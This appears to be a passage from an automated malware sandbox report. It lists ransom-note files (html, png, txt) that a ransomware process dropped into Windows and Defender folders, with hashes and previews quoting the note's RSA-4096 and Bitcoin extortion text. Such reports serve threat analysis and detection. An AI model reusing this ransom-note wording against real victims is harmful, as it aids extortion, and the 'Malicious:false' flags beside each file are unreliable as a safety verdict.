                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\WDF\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\WDF\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\WDF\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\WinMSIPC\Server\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\WinMSIPC\Server\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\WinMSIPC\Server\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\WinMSIPC\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\WinMSIPC\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\WinMSIPC\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Clean Store\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Clean Store\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
